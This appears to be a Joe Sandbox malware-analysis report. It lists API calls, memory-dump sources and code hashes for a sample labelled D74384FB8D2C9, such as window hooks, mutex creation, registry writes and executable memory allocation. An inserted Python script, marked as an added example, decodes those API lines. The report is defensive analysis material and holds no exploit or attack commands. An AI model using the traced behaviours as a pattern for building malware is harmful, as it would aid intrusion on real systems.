                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ed118fff639f0311c9157af4dbabd80574dffefffcd18bf4f3873c9098bc68f
                                                                                  • Instruction ID: 72a136113ef12d8f419df088b22d03553424e76b7aafd072bbb488c3aa2e27de
                                                                                  • Opcode Fuzzy Hash: 3ed118fff639f0311c9157af4dbabd80574dffefffcd18bf4f3873c9098bc68f
                                                                                  • Instruction Fuzzy Hash: 68E0923604120ADBEF60CD6898807A737D59B52330B28463BD071E3290D3748C82A799
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000030,?,00000000), ref: 0042402F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: a7187430c4c02986b158c48688ddc6c72a72472fccc442fa29672908e4cd57cb
                                                                                  • Instruction ID: 7de73393f2d22c7f97f1ff64d3bcb864227be5c8f089a62afe50a59c36f1ff41
                                                                                  • Opcode Fuzzy Hash: a7187430c4c02986b158c48688ddc6c72a72472fccc442fa29672908e4cd57cb
                                                                                  • Instruction Fuzzy Hash: A8F0ACB4E00108AFDB04DF94D895EADF775EF48300F1082EEE91567391DA75AE01CB54
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004421FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5e03003e743a976aca59c791bff85902756cd80c45ed87c97cfb0469da9cf4e5
                                                                                  • Instruction ID: 812773b742beabaac28696b0454d96d92f6870bf326b3091aa94c089d217b903
                                                                                  • Opcode Fuzzy Hash: 5e03003e743a976aca59c791bff85902756cd80c45ed87c97cfb0469da9cf4e5
                                                                                  • Instruction Fuzzy Hash: 59E01A729402087ADB14EAA4CD42FEF76BCAB08700F100109B701BA0C1D560AA0587A4
                                                                                  APIs
                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0BE9B9B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: b074d97571478b5a7d9d58b93d66ae9cd11e265affbb6eaa2dd03f7aba6d1ea5
                                                                                  • Instruction ID: 1769a5b608c3ed0e9d9c413edcc879c895604a18fbb837d6d190acd9ebcb3f61
                                                                                  • Opcode Fuzzy Hash: b074d97571478b5a7d9d58b93d66ae9cd11e265affbb6eaa2dd03f7aba6d1ea5
                                                                                  • Instruction Fuzzy Hash: E8D05B723181107AD620955A7C84DBB6BDCCFC5775F10063DF598C3280D7208C05C371
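The "APIs" lines above are printed with raw hexadecimal arguments, which hides the two things a triager wants from them: which registry hives and keys the module at 0BE90000 probes (the Software\Borland\Locales and Software\Borland\Delphi\Locales lookups are the registry probe the Delphi runtime performs for its locale override, a strong hint that this module is Delphi-built), and what the file and window calls from the 00401000 region actually request (CreateFileA with C0000000 and 00000003 is GENERIC_READ|GENERIC_WRITE on an existing file; SendMessageA with 00000030 is WM_SETFONT). The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: it parses lines of exactly this shape, including the "Part of subcall function" prefix, and names the Win32 constants in the argument slots that matter. Constant values are taken from the Windows SDK headers; the sample lines are copied from the listings in this section; the remark in the code that 0xF0019 is what older Delphi Windows.pas units declare as KEY_READ is my attribution and should be treated as an assumption.

```python
"""Decode the "APIs" lines of a Joe Sandbox function listing (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# One report line: optional bullet, optional "Part of subcall function X:",
# ApiName[.MODULE][(arg,arg,...)] followed by ", ref: <call site>".
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)(?:\.(?P<module>\w+))?"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX = re.compile(r"[0-9A-Fa-f]{1,8}")  # Joe prints numeric args as bare hex

# Win32 constants (values from the SDK headers). Tables keyed by single bits
# are decoded as flag sets; the others as enumerations.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# 0x000F0019 = STANDARD_RIGHTS_REQUIRED | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY.
# The SDK's KEY_READ is 0x20019; 0xF0019 is (assumption) what older Delphi
# Windows.pas units declare as KEY_READ, which matches the Borland lookups here.
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x10000: "DELETE",
              0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
              0x100000: "SYNCHRONIZE"}
WINDOW_MESSAGES = {0x0C: "WM_SETTEXT", 0x0D: "WM_GETTEXT", 0x10: "WM_CLOSE",
                   0x30: "WM_SETFONT", 0x111: "WM_COMMAND"}
HEAP_FLAGS = {0x4: "HEAP_GENERATE_EXCEPTIONS", 0x8: "HEAP_ZERO_MEMORY"}

# API name -> {argument index: ("flags" | "enum", table)}
DECODERS = {
    "CreateFileA": {2: ("flags", GENERIC_ACCESS), 5: ("enum", CREATION_DISPOSITION)},
    "CreateFileW": {2: ("flags", GENERIC_ACCESS), 5: ("enum", CREATION_DISPOSITION)},
    "RegOpenKeyExA": {0: ("enum", HKEYS), 3: ("flags", KEY_RIGHTS)},
    "RegOpenKeyExW": {0: ("enum", HKEYS), 3: ("flags", KEY_RIGHTS)},
    "SendMessageA": {1: ("enum", WINDOW_MESSAGES)},
    "SendMessageW": {1: ("enum", WINDOW_MESSAGES)},
    "HeapAlloc": {1: ("flags", HEAP_FLAGS)},
}


@dataclass
class ApiCall:
    api: str
    module: Optional[str]
    args: List[str]
    ref: int                      # call-site address from "ref:"
    callee: Optional[int] = None  # set for "Part of subcall function" lines
    decoded: Dict[int, str] = field(default_factory=dict)


def _flags(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as NAME|NAME|0xREST, consuming known bits high to low."""
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for lines that are not API calls."""
    m = _LINE.match(line)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") is not None else []
    call = ApiCall(api=m.group("api"), module=m.group("module"), args=args,
                   ref=int(m.group("ref"), 16),
                   callee=int(m.group("callee"), 16) if m.group("callee") else None)
    for idx, (kind, table) in DECODERS.get(call.api, {}).items():
        if idx < len(args) and _HEX.fullmatch(args[idx]):
            value = int(args[idx], 16)
            call.decoded[idx] = (_flags(value, table) if kind == "flags"
                                 else table.get(value, f"0x{value:X}"))
    return call


def parse_report(lines: List[str]) -> List[ApiCall]:
    return [c for c in (parse_api_line(ln) for ln in lines) if c is not None]


def describe(call: ApiCall) -> str:
    """Human-readable rendering with decoded constants substituted in place."""
    shown = [call.decoded.get(i, a) for i, a in enumerate(call.args)]
    name = f"{call.api}.{call.module}" if call.module else call.api
    return f"{name}({', '.join(shown)}) @ {call.ref:08X}"


def registry_keys(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """(hive, subkey) pairs for every RegOpenKeyEx/RegCreateKeyEx in the listing."""
    opens = ("RegOpenKeyExA", "RegOpenKeyExW", "RegCreateKeyExA", "RegCreateKeyExW")
    return [(c.decoded.get(0, c.args[0]), c.args[1])
            for c in calls if c.api in opens and len(c.args) >= 2]


# Sample input: lines copied from the function listings in this report section.
SAMPLE_LINES = [
    "• SetFilePointer.KERNEL32(?,?,?), ref: 0BE9BA1E",
    "• GetModuleFileNameA.KERNEL32(0BE90000,?,00000105), ref: 0BE9618E",
    "  • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000001,Software\\Borland\\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9643D",
    "  • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000002,Software\\Borland\\Locales,00000000,000F0019,?,80000001,Software\\Borland\\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9645B",
    "  • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000001,Software\\Borland\\Delphi\\Locales,00000000,000F0019,?,80000002,Software\\Borland\\Locales,00000000,000F0019,?,80000001,Software\\Borland\\Locales,00000000,000F0019,?,00000000), ref: 0BE96479",
    "• SendMessageA.USER32(?,00000030,?,00000000), ref: 0042402F",
    "• CreateFileA.KERNEL32(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004421FA",
    "• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0BE9B9B8",
    "• _malloc.LIBCMT ref: 6A6EE0BA",
]

if __name__ == "__main__":
    calls = parse_report(SAMPLE_LINES)
    for c in calls:
        print(describe(c))
    print("registry keys touched:", registry_keys(calls))
```

Running the block on the sample lines prints each call with its constants named and a list of the three Borland registry keys the locale lookup opens; feeding it the full "APIs" listing of a report gives a quick inventory of hives, keys, file access modes and window messages without reading every hex argument by hand.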
APIs
• _malloc.LIBCMT ref: 6A6EE0BA
  • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
  • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
  • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: AllocHeap_malloc
• String ID:
• API String ID: 3293231637-0
APIs
• _malloc.LIBCMT ref: 0044290B
  • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
  • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: AllocateHeap_malloc
• String ID:
• API String ID: 501242067-0
APIs
• SendMessageA.USER32(?,00000030,?,00000000), ref: 0042CE2B
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6A701169,?), ref: 6A7069F9
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
APIs
• InterlockedExchange.KERNEL32(6A72FA38,?), ref: 6A6EF47B
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: ExchangeInterlocked
• String ID:
• API String ID: 367298776-0
APIs
• GetFileAttributesA.KERNEL32(?,0040A913,0040A913,00000000), ref: 0040BB2B
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• RegSetValueExA.KERNEL32(?,?,00000000,00000000,00000001,?,00000000), ref: 00408830
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• SetWindowTextA.USER32(?,?,00000000,?,?,0042D39F,0042C756,00000000,?), ref: 0042C893
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
APIs
• SetWindowsHookExA.USER32(?,000000FF,Function_00049C43,00000000,?,00466E42), ref: 0044ADFF
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: _malloc
• String ID:
• API String ID: 1579825452-0
APIs
• CreateMutexA.KERNEL32(?,?,?,?,0BEF5193,00000000,00000000,00000000,.mtx,?,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF545C), ref: 0BE97276
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                  • Instruction ID: 46eae50369b6be1bade0a2901a11078955870ac433f135f47b4ab0a529cbf885
                                                                                  • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                  • Instruction Fuzzy Hash: BBC0127317024CAF8B00EEA8DC05D9F33DC5B18505B008414B518C7100D139E5548B60
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420A52,00000005), ref: 0044948A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: c9de29c50f192f93b177c3c6420cd547a5b3479b9200045b02903cd5c2817574
                                                                                  • Instruction ID: 787606718c0c3050ede8edd67cddb3edda02b8b8c79bcc5dfcf80af2b39e9fbc
                                                                                  • Opcode Fuzzy Hash: c9de29c50f192f93b177c3c6420cd547a5b3479b9200045b02903cd5c2817574
                                                                                  • Instruction Fuzzy Hash: 19D09272144648EFDB048B50E808BBA3BA5FB9832AF6140A9E5480E622C7379866DB44
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3646066109-0
                                                                                  • Opcode ID: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                                                                                  • Instruction ID: 02fc6e0fe4c119964e2f3369f3dd15230d4ce90c75cbdae128b96965c2990ead
                                                                                  • Opcode Fuzzy Hash: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                                                                                  • Instruction Fuzzy Hash: 4BC0927A44020C77DF112A83EC03E4A3F1ADBC0774F048025FB1C19162AAB7EAA196CA
                                                                                  APIs
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,00000000,?,0044B190,?,?,?,?,00000004,00409C74,Function_00008B20,00000000,00000000,00000000,00000000), ref: 0044A988
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: PriorityThread
                                                                                  • String ID:
                                                                                  • API String ID: 2383925036-0
                                                                                  • Opcode ID: ddc42a54c7d2ec11b33b444c52c82f131c2b40b377d724689d17fffdcb22b600
                                                                                  • Instruction ID: 52e9a5fcbd096cdb4dbe5613cc8ef1c47baabf37b89a3e5b7a28070516fdd0bf
                                                                                  • Opcode Fuzzy Hash: ddc42a54c7d2ec11b33b444c52c82f131c2b40b377d724689d17fffdcb22b600
                                                                                  • Instruction Fuzzy Hash: 8CB092B3000208B78A012AE29C49C8A7E1EABD97607108411F60C0A1128A33E472E6A4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __make__time64_t
                                                                                  • String ID:
                                                                                  • API String ID: 1242165881-0
                                                                                  • Opcode ID: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                  • Instruction ID: 8b079176faed591c253fe4ee6357d312a3bfbc766710cee63be3ee367cd2e735
                                                                                  • Opcode Fuzzy Hash: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                  • Instruction Fuzzy Hash: 5BB0123714834C2BD70075CFA443E8537CD8BC4B24F100016B62C0B1C2ADA3F88051DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3498533004-0
                                                                                  • Opcode ID: 9055fe6a5769d55a1818a5891333d79c6588340a7f8daf1935e8e0d0dc4af59b
                                                                                  • Instruction ID: 9203a9f50baebbe4a790c827808eea32774de16e7e01f577c73b1c40d7c2c781
                                                                                  • Opcode Fuzzy Hash: 9055fe6a5769d55a1818a5891333d79c6588340a7f8daf1935e8e0d0dc4af59b
                                                                                  • Instruction Fuzzy Hash: C19004515F745F000D30153C440443C4045F05170FF411FF07453C50C5DF4040571405
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7101caad66fa4d895e222209a2c2a16301773b54719139c1e79e082bbc61efe0
                                                                                  • Instruction ID: ec936bb6eae5c2f2f88241aa52067fbbbc57561ed6186e3438eea2db0e72be6d
                                                                                  • Opcode Fuzzy Hash: 7101caad66fa4d895e222209a2c2a16301773b54719139c1e79e082bbc61efe0
                                                                                  • Instruction Fuzzy Hash: 76613AB4E04208DFDF14DF94C594BAEBBB1AF48314F20819ED8856B341D379AA85CF95
                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,000000FF), ref: 6A6F2BE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1659193697-0
                                                                                  • Opcode ID: 06e6233b281234104916c54e6e47715395ca5273628cb6e5f42c0d9ab67ec545
                                                                                  • Instruction ID: c7e701076d323f489073bec98e0c8ada23f985fe6f8281f360dbe1948dfa0ccc
                                                                                  • Opcode Fuzzy Hash: 06e6233b281234104916c54e6e47715395ca5273628cb6e5f42c0d9ab67ec545
                                                                                  • Instruction Fuzzy Hash: 25210531A04290AFCB659E78C888B4E7BA6AF46364F2149A8F411DB3D1CF34DC42CB94
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0BEF4C80,00000000,?,0BEB1C67,?,?,00000000,0BE90000,00000000,00000000,00000000), ref: 0BEB1B2E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
